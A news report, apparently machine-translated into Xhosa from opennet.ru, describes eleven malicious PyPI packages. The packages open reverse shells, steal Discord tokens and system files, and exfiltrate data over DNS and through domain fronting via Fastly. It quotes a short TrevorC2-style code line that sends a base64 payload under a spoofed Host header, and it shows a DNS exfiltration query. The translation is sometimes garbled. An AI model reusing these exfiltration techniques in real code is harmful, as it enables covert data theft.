Kwi-PyPI (i-Python Package Index), iipakethi ze-11 eziqulethe ikhowudi enobungozi zichongiwe. Phambi kokuba zichongwe iingxaki, iipakethe bezikhutshiwe malunga namawaka angama-38 ngamaxesha ewonke. Iiphakheji ezinobungozi ezifunyenweyo ziphawuleka ekusebenziseni kwazo iindlela eziphucukileyo zokufihla iziteshi zonxibelelwano kunye neeseva zabahlaseli.
- importantpackage (6305 ukhuphelo), ebalulekileyo-iphakheji (12897) - yaseka uxhulumaniso kumncedisi wangaphandle phantsi kwengubo yokuqhagamshela pypi.python.org ukubonelela iqokobhe ufikelelo kwinkqubo (iqokobhe reverse) kwaye wasebenzisa inkqubo trevorc2 ukufihla umjelo wonxibelelwano.
- pptest (10001), ipboards (946) - isetyenziswe i-DNS njengejelo lonxibelelwano ukuhambisa ulwazi malunga nenkqubo (kwipakethi yokuqala igama lomninimzi, ulawulo olusebenzayo, i-IP yangaphakathi nangaphandle, okwesibini - igama lomsebenzisi kunye negama lomninimzi) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - ichonge ithokheni yenkonzo yeDiscord kwinkqubo kwaye iyithumele kumamkeli wangaphandle.
- I-trrfab (287) - ithumele isazisi, igama lomninimzi kunye nemixholo ye /etc/passwd, /etc/hosts,/home to the external host.
- I-10Cent10 (490) - iseke uxhulumaniso lweqokobhe olubuyela umva kunye nomkhosi wangaphandle.
- yandex-yt (4183) - ibonise umyalezo malunga nenkqubo echithwayo kwaye iqondiswe kwakhona kwiphepha ngolwazi olongezelelweyo malunga nezenzo ezingaphezulu ezikhutshwe nge-nda.ya.ru (api.ya.cc).
Eyona nto ibalulekileyo yindlela yokufikelela kwimikhosi yangaphandle esetyenziswe kwi-package ebalulekileyo kunye neepakethe ezibalulekileyo, ezisetyenziselwa inethiwekhi yokuhanjiswa komxholo ngokukhawuleza esetyenziswe kwi-PyPI directory ukufihla umsebenzi wabo. Enyanisweni, izicelo zithunyelwe kwi-pypi.python.org iseva (kubandakanywa nokuchaza igama elithi python.org kwi-SNI ngaphakathi kwesicelo se-HTTPS), kodwa i-HTTP "I-Host" i-header iquka igama lomncedisi olawulwa ngabahlaseli (i-sec. phambili.io. global.prod.fastly.net). Inethiwekhi yokuhanjiswa komxholo ithumele isicelo esifanayo kwiseva ehlaselayo, isebenzisa iiparitha zoqhagamshelo lwe-TLS kwi-pypi.python.org xa uhambisa idatha.
Isiseko se-PyPI sinikwa amandla yi-Fastly content network network, esebenzisa i-Varnish i-proxy ecacileyo kwi-cache yezicelo eziqhelekileyo, kwaye iphinda isebenzise ukuqhutyelwa kwesatifikethi se-TLS kwinqanaba le-CDN, kunokuba kwiiseva zokugqibela, ukuhambisa izicelo ze-HTTPS nge-proxy. Kungakhathaliseki ukuba yiyiphi inginginya ekujoliswe kuyo, izicelo zithunyelwa kwi-proxy, emisela umamkeli ofunwayo usebenzisa i-HTTP "Inginginya" ye-header, kunye namagama e-domain yenginginya ebotshelelwe kwi-CDN yomthwalo we-balancer IP iidilesi eziqhelekileyo kubo bonke abathengi abakhawulezayo.
Umncedisi wabahlaseli ubhalisa kunye ne-CDN ngokukhawuleza, ebonelela ngezicwangciso zamahhala kuwo wonke umntu kwaye ivumela ukubhaliswa okungaziwa. Kuyaphawuleka ukuba ukuthumela izicelo kwixhoba xa udala "igobolondo elijikelezayo", iskimu sikwasetyenziswa, kodwa siqaliswe kwicala lomhlaseli womhlaseli. Ukusuka ngaphandle, ukusebenzisana nomncedisi wabahlaseli kukhangeleka njengeseshoni esemthethweni kunye ne-PyPI directory, efihliweyo usebenzisa isatifikethi se-PyPI TLS. Indlela efanayo, eyaziwa ngokuba "yi-domain fronting," yayifudula isetyenziselwa ukufihla igama lomninimzi xa ugqitha ukubhloka, kusetyenziswa isakhono esinikwe kwezinye iinethiwekhi ze-CDN ukufikelela kwi-HTTPS ngokubonisa umamkeli ongeyonyani kwi-SNI kwaye eneneni ehambisa igama ucelile umamkeli kwi-header yoMamkeli weHTTP ngaphakathi kweseshoni yeTLS.
Ukufihla umsebenzi okhohlakeleyo, iphakheji ye-TrevorC2 iye yasetyenziselwa ukwenza unxibelelwano kunye neseva ngokufana nokukhangela rhoqo kwiwebhu, umzekelo, izicelo ezinobungozi zathunyelwa phantsi komfanekiso wokukhuphela umfanekiso "https://pypi.python.org/images/ guide=β ngolwazi olufakwe kwiparamitha yesikhokhelo. url = "https://pypi.python.org" + "/imifanekiso" + "?" + "guid=" + b64_payload r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
I-pptest kunye neepakethe ze-ipboards zisebenzise indlela eyahlukileyo yokufihla umsebenzi womnatha, ngokusekelwe kwi-encoding yolwazi oluluncedo kwimibuzo kwiseva ye-DNS. I-malware idlulisela ulwazi ngokwenza izicelo ze-DNS ezifana ne "nu4timjagq4fimbuhe.example.com", apho idatha edluliselwe kwi-server yokulawula ifakwe ngekhowudi isebenzisa i-base64 ifomathi kwigama le-subdomain. Umhlaseli ufumana le miyalezo ngokulawula iseva ye-DNS yesizinda somzekelo.com.
umthombo: opennet.ru